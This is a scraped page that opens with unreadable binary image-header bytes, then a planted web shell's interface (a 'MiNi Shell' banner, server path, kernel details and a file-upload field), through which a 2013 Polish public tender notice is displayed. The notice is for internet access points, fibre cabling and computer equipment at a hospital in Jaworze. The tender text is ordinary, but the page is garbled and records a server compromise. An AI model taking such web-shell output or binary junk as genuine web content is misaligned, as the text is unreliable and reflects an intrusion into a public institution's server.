JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130126/36370-N-2013.html

<p class="kh_header"><b>Jaworze: Stworzenie publicznych punktów dostępu do Internetu na terenie Beskidzkiego Zespołu 
Leczniczo - Rehabilitacyjnego Szpitala Opieki Długoterminowej w Jaworzu - 3 części:

Część nr I - Budowa międzybudynkowego połączenia światłowodowego;
Część nr II - Dostawa sprzętu komputerowego oraz wyposażenia wymaganych do utworzenia miejsc publicznego dostępu do Internetu;
Część nr III - Stworzenie infrastruktury teleinformatycznej, sieci komputerowej oraz 
wykonanie robót budowlanych w tym zakresie</b><br>
<b>Numer ogłoszenia: 36370 - 2013; data zamieszczenia: 26.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Beskidzki Zespół Leczniczo-Rehabilitacyjny Szpital Opieki Długoterminowej , ul. Słoneczna 83, 43-384 Jaworze, woj. śląskie, tel. 033 8172166 (-67), faks 033 8173463.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rehabilitacja-jaworze.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stworzenie publicznych punktów dostępu do Internetu na terenie Beskidzkiego Zespołu 
Leczniczo - Rehabilitacyjnego Szpitala Opieki Długoterminowej w Jaworzu - 3 części:

Część nr I - Budowa międzybudynkowego połączenia światłowodowego;
Część nr II - Dostawa sprzętu komputerowego oraz wyposażenia wymaganych do utworzenia miejsc publicznego dostępu do Internetu;
Część nr III - Stworzenie infrastruktury teleinformatycznej, sieci komputerowej oraz 
wykonanie robót budowlanych w tym zakresie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stworzenie publicznych punktów dostępu do Internetu na terenie Beskidzkiego Zespołu Leczniczo - Rehabilitacyjnego Szpitala Opieki Długoterminowej w Jaworzu. Przedmiot zamówienia został podzielony na 3 części, każda z części stanowi odrębny przedmiot zamówienia tj:
a) 	Część nr I - Budowa międzybudynkowego połączenia światłowodowego;
b) 	Część nr II - Dostawa sprzętu komputerowego oraz wyposażenia wymaganych do utworzenia miejsc publicznego dostępu do Internetu;
c) Części nr III - Stworzenie infrastruktury teleinformatycznej, sieci komputerowej oraz wykonanie robót budowlanych w tym zakresie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 32.42.40.00-1, 48.00.00.00-8, 45.31.43.20-0, 45.23.10.00-8, 45.31.40.00-1, 71.32.00.00-7, 45.21.51.40-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości w zakresie:
Części nr I 2 000,00 zł; (słownie: dwa tysiące złotych00/00).
Części nr II 3 000,00 zł; (słownie: trzy tysiące złotych00/00).
Części nr III 2 500,00 zł; (słownie: dwa tysiące pięćset złotych00/00)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia w/w warunku, dokona oceny jego spełnienia na podstawie oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy Pzp - załącznik nr 8 do SIWZ, według formuły spełnia - nie spełnia (dotyczy części I,II,II).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzonej działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej, wykonali i prawidłowo ukończyli co najmniej:
a.2.1.a) jedną umowę obejmującą swym zakresem robotę budowlaną polegającą na budowie lub rozbudowie okablowania światłowodowego między budynkami o wartości co najmniej 30 000,00  na zł brutto (dotyczy części nr I);
a.2.1.b) jedną umowę obejmującą swym zakresem robotę budowlaną polegającą na budowie lub rozbudowie linii światłowodowej na podbudowie słupów sieci energetycznej  o wartości robót minimum 45 000,00 zł brutto (dotyczy części nr I);
a.2.1.c) jedną umowę obejmującą swym zakresem robotę budowlaną polegającą na budowie lub rozbudowie okablowania strukturalnego o wartości co najmniej 15 000,00 zł brutto (dotyczy części nr III);
a.2.1.d)  jedną umowę obejmującą swym zakresem robotę budowlaną polegającą na budowie lub przebudowie lub remoncie w skład w której wchodziły min. roboty ogólnobudowlane oraz roboty elektryczne o wartości co najmniej 80 000,00 zł brutto (dotyczy części nr III).
a.2.2) tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzonej działalności jest krótszy - w tym okresie, wykonali a w przypadku świadczeń okresowych lub ciągłych wykonują należycie co najmniej:
a.2.2.a) dwie umowy obejmujące swym zakresem dostawę sprzętu komputerowego wraz z oprogramowaniem o wartości minimum 60 000,00 zł brutto każda (dotyczy pakietu nr II);
a.2.2.b) jedną umowę obejmującą swym zakresem wykonanie dokumentacji projektowo - kosztorysowej dotyczącej budowy lub rozbudowy dedykowanej sieci elektrycznej o wartości minimum 3 500,00  zł brutto (dotyczy pakietu nr III);
a.2.2.c)  jedną umowę obejmującą swym zakresem wykonanie dokumentacji projektowo - kosztorysowej dotyczącej budowy lub rozbudowy okablowania światłowodowego między budynkami o wartości min 7 000,00 zł brutto (dotyczy części nr I).
Zamawiający dopuszcza możliwość wykazania się w/w doświadczeniem i wiedzą  w zakresie realizacji jednej umowy lub wielu umów.
Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy Pzp - załącznik nr 8 do SIWZ a także wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a 	jeśli okres prowadzonej działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, oraz załączeniem dokumentu potwierdzającego, że 	roboty zostały wykonane zgodnie z zasadami sztuki budowlanej 		i prawidłowo 	ukończone - przykładowe wykazy stanowią:
Załącznik nr 9 do SIWZ - wykaz robót budowlanych dla części I zamówienia;
Załącznik nr 9a do SIWZ- wykaz robót budowlanych dla części III zamówienia oraz wykazu usług i dostaw wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzonej działalności jest krótszy - w tym okresie, z podaniem ich wartości, 	przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że 	te dostawy i usługi zostały wykonane a w przypadku świadczeń okresowych lub ciągłych 	są wykonywane należycie - przykładowe wykazy stanowią:
Załącznik nr 10 do SIWZ - wykaz dostaw i usług dla części I zamówienia;
Załącznik nr 10a do SIWZ- wykaz dostaw dla części II zamówienia;
Załącznik nr 10b do SIWZ- wykaz dostaw i usług dla części III zamówienia;
według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia w/w warunku, dokona oceny jego spełnienia na podstawie oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy Pzp - załącznik nr 8 do SIWZ, według formuły spełnia - nie spełnia (dotyczy części I,II,III).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia w/w warunku, dokona oceny jego spełnienia na podstawie oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy Pzp - załącznik nr 8 do SIWZ, według formuły spełnia - nie spełnia (dotyczy części I,II,III).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy, są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej w zakresie:
Części nr I 70 000,00 zł;
 Części nr II 100 000,00 zł;
  Części nr III 100 000,00 zł;
2.		W przypadku oferty złożonej na więcej niż jedną część przedmiotu zamówienia, Wykonawca zobowiązany jest wykazać się posiadaniem ubezpieczania od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia co najmniej na równoważność najwyższej kwoty z części na które składana jest oferta. 
3.	Wykazać się muszą również, iż posiadają środki finansowe lub zdolność kredytową o łącznej kwocie co najmniej w zakresie:
	Części nr I 70 000,00 zł;
	Części nr II 100 000,00 zł;
	Części nr III 100 000,00 zł;
4.		W sytuacji gdy Wykonawca składa Ofertę na więcej niż jedną cześć zamówienia, zobowiązany jest wykazać posiadanie środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż suma minimalnych środków finansowych lub zdolności kredytowych wskazanych powyżej, wymaganych w stosunku do tych części na które Wykonawca składa ofertę.
5.		Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenie o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy Pzp - załącznik nr 8 do SIWZ a także informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek potwierdzający wysokość posiadanych środków lub zdolność kredytową, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert oraz opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Harmonogram rzeczowo - terminowo - finansowy, zawierający wszystkie koszty składające się na cenę oferty, niezbędne do zrealizowania przedmiotu zamówienia z ich podziałem na poszczególne etapy. W przypadku zaistnienia rozbieżności w założonym i rzeczywistym terminie realizacji zadania, Wykonawca jest zobowiązany do zaktualizowania przedstawionego w ofercie harmonogramu. Aktualizacja ta musi być zatwierdzona przez Zamawiającego (dotyczy części I,III).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenie z art. 22 ust 1 ustawy Pzp. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, w ofercie musi zostać złożone przedmiotowe oświadczenie i podpisane przez tych Wykonawców, którzy spełniają postawione warunki. Na przykład jeżeli Wykonawca A spełnia warunek art. 22 ust 1 pkt 1 i 2 ustawy Pzp, a wykonawca B spełnia warunek art. 22 ust 1 pkt 3 i 4 ustawy Pzp, złożenie podpisów tych Wykonawców pod jednym oświadczeniem będzie uznane jako odpowiadające warunkom SIWZ.
2.	Oświadczenie z art. 24 ust 1 ustawy Pzp. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe oświadczenia przez każdego z wykonawców składających ofertę wspólną lub jedno, podpisane przez wszystkich wykonawców składających taką ofertę.
3.	Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu dotyczące art. 24 ust 1 ustawy Pzp musi złożyć w ofercie każdy z Wykonawców wspólnie ubiegający się o udzielenie zamówienia. W przypadku dokumentów potwierdzających spełnienie warunków udziału z art. 22 ust 1 ustawy Pzp wystarczy, że dokumenty potwierdzające spełnienie warunków złoży co najmniej jeden z jej uczestników oferty wspólnej lub gdy z dokumentów złożonych przez tych Wykonawców łącznie będzie wynikać ich spełnienie.
4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 23 ustawy pzp). Pełnomocnictwo takie należy złożyć do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zakresie części nr I i nr III
1.	Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza zmianę  umowy w następujących przypadkach:
1)	wystąpi siła wyższa uniemożliwiająca Wykonawcy wykonanie przedmiotu zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia wykonania niniejszej umowy o czas w jakim siła wyższa uniemożliwiała wykonanie obowiązków Stron,
2)	wystąpi brak na rynku dostępnych towarów lub materiałów służących do ich wytworzenia, oferowanych w ofercie Wykonawcy, które mogą być zastąpione innymi materiałami lub urządzeniami spełniającymi wymagania Zamawiającego określone w SIWZ lub wystąpi konieczność wykonania robót zamiennych, albo wystąpią inne obiektywne okoliczności uniemożliwiające spełnienie przez Wykonawcę świadczenia określonego w umowie; w takich przypadkach Wykonawca i Zamawiający postanowią o zmianie przedmiotu zamówienia lub sposobu świadczenia albo terminu wykonania umowy (o czas trwania ww. okoliczności), bądź też wysokości wynagrodzenia Wykonawcy ustalonego w umowie.
3)	wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację umowy ze strony Wykonawcy lub ze strony Zamawiającego).
